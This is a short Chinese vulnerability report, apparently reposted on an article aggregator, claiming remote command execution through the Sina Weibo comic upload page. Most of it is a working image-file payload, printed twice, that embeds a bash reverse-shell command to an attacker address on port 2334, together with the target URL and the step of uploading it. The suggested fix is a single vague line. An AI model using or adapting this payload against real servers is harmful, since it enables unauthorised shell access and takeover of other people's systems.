新浪微博某处远程命令执行漏洞(可反弹shell操作服务器)
程序员文章站
2022-03-19 11:21:28
RT
来到这里https://manhua.weibo.com/space/upload_comic
上传poc
push graphic-context
viewbox 0 0 64...
RT
来到这里https://manhua.weibo.com/space/upload_comic
上传poc
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"
pop graphic-context
反弹一波
来到这里https://manhua.weibo.com/space/upload_comic
上传poc
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/x.x.x.x/2334 0>&1"
pop graphic-context
反弹一波
解决方案:
完善代码